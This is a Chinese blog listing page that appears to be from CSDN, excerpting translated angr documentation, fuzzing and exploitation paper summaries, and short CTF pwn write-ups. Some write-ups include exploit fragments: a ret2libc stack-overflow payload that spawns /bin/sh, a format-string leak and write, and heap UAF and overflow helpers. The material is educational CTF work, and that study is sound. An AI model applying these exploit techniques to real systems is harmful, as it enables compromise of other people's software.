- 博客(17)
- 资源 (1)
- 收藏
- 关注

原创 angr翻译目录
angr目录Top Level InterfacesLoading a BinarySolver EngineProgram StateSimulation ManagersExecution Engines
2019-06-20 14:41:49
255
翻译 Angora: Efficient Fuzzing by Principled Search
摘要主要目标:在不用符号执行的情况下求解路径约束。引入技术:可扩展的字节级污点跟踪,上下文敏感的分支计数,基于梯度下降的搜索,输入长度探测。测试:LAVA-M,file,jhead,nm,objdump,size。1 介绍使用符号执行:klee,mayhem[5,8],许多约束无法求解:符号执行综述[6]避免符号执行及其他大开销的程序分析技术:AFL[1],覆盖范围反馈。开销低,却导致...
2019-12-02 11:06:58
937
翻译 HEAPHOPPER: Bringing Bounded Model Checking to Heap Implementation Security
摘要堆元数据攻击已经成为攻击者利用内存损坏漏洞的主要方式之一。尽管堆实施开发者已经引入预防和检查崩溃的错书,攻击者仍然能围绕它们做一些事情。在某种程度上,这是因为这些预防措施没有一个原理基础,这导致它在很多时候复杂而低效。在本文中,我们提出HEAPHOPPER,一个自动化的方式,基于模型检测和符号执行,来分析内存损坏情况下的堆利用实现。使用HEAPHOPPER,我们能够对不同的广泛的堆实施进行...
2019-11-30 08:32:32
360
翻译 KEPLER: Facilitating Control-flow Hijacking Primitive Evaluation for Linux Kernel Vulnerabilities
Abstract自动利用的挑战:将一个可利用的状态与一个rop链相连。控制流劫持是一个方案。困境:普遍的利用缓解技术,利用路径上的陷阱和不适宜的原语,导致手工生成linux内核利用原语都很困难。成果:提出KEPLER来生成一个单发的利用链来帮助利用生成。具体:接受一个控制流劫持原语作为输入,符号化地缝合一些流行内核编码风格和相应片段以生成ROP载荷。实验:通过比较先前地自动利用生成技术和...
2019-11-30 08:30:55
319
翻译 libdft: Practical Dynamic Data Flow Tracking for Commodity Systems
Abstract背景:动态数据流跟踪技术标记并跟踪感兴趣的数据在程序执行过程中的传播过程。现状:DFT已经被许多用于不同目的的工具反复实施多次,包括防止0day漏洞和跨站脚本攻击,检查和防止信息泄露,分析合法和恶意的软件。结果:我们提出libdft,一个动态DFT框架,与之前不同,libdft高效且可以重用,并适用于各种商用软件和硬件。libdft提供了建立DFT工具的API,促进研究。我...
2019-11-30 08:29:48
531
翻译 MOPT: Optimized Mutation Scheduling for Fuzzers
摘要背景:基于变异的fuzz是最流行的漏洞发现解决方案之一,它的效果很大程度上基于变异策略。问题:现有的fuzzer遵循一个特定的分布来选择变异算子,这在一般程序中发现漏洞的效率较低。结果:提出一种新的变异调度策略MOPT,让基于编译的fuzzer更有效率地发现漏洞。实施:MOPT使用一个定制的粒子群优化(PSO)算法求出关于模糊测试效率的算子的最优选择概率分布,并提供一种pacemake...
2019-11-30 08:27:11
861
翻译 Angr:Execution Engines
原文链接:https://docs.angr.io/core-concepts/simulation
2019-06-19 22:11:43
182
翻译 Angr:Simulation Managers
原文链接:https://docs.angr.io/core-concepts/pathgroups
2019-06-19 22:10:35
735
翻译 Angr:Loading a Binary
原文链接:https://docs.angr.io/core-concepts/toplevel在此之前,您只看到了angr加载工具最简单的功能—您加载/bin/true,然后在没有共享库的情况下再次加载它。你也看到了proj.loader和一些它能做的事情。现在,我们将深入研究这些接口的细微差别以及它们可以告诉您的东西。我们简要介绍了angr的二元加载元件CLE。CLE代表"CLE Loa...
2019-06-19 22:01:56
459
翻译 Angr:Top Level Interfaces
原文链接:https://docs.angr.io/core-concepts/toplevel在开始学习angr之前,您需要对一些基本的angr概念以及如何构造一些基本的angr对象有一个基本的了解。我们将通过认识在您加载了二进制文件之后,您可以直接使用哪些功能来探究这个问题!使用angr的第一个操作总是将二进制文件加载到项目中。我们将使用/bin/true程序来做示例。>>...
2019-06-18 14:09:24
279
原创 w4-5
漏洞:栈溢出exp:1、用write泄露libc2、system("/bin/sh")# write(1,got_write,4) back to 0x08048460payload = 140*"a"+p32(elf.plt["write"])+p32(0x08048460)payload += p32(1) + p32(elf.got["write"]) + p32(4)p.se...
2019-05-31 15:14:06
171
原创 w4-4
漏洞:delete指针未清0,产生UAF。基本功能Keep secret①small②big③hugeWipe secretRenew secret交互def add(index, content): p.recvuntil("Renew secret\n") p.sendline("1") p.recvuntil("\n") p.sendline(...
2019-05-30 21:58:59
214
原创 w4-3
漏洞:格式化字符串%p泄露%n任意地址写exp1p.recvuntil("username")p.sendline("xx")p.recvuntil("Input your password")# 泄露偏移6处的内容p.sendline("%6$p")p.recvuntil(">")p.sendline("1")p.recvuntil("xx\n")x = p.recv...
2019-05-30 21:03:25
125
原创 w4-2
漏洞:delete时没有把指针置零,可以UAF。基本功能:New PostEdit a PostDelete a PostShow all PostsI want to post a lonely hearts ad!!!Exit交互def add(index, data): io.recvuntil('Your Choice:') io.sendline(s...
2019-05-30 10:58:16
178
原创 w4-1
漏洞:create和edit都没有检查长度,产生堆溢出。基本功能:create notesdisplay notesdelete notesmodify notesexit交互def create(size,content): p.recvuntil("5. exit\n") p.sendline("1") p.recvuntil("Please enter the si...
2019-05-27 23:26:48
652
w4-1程序与脚本.zip
2019-05-28
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人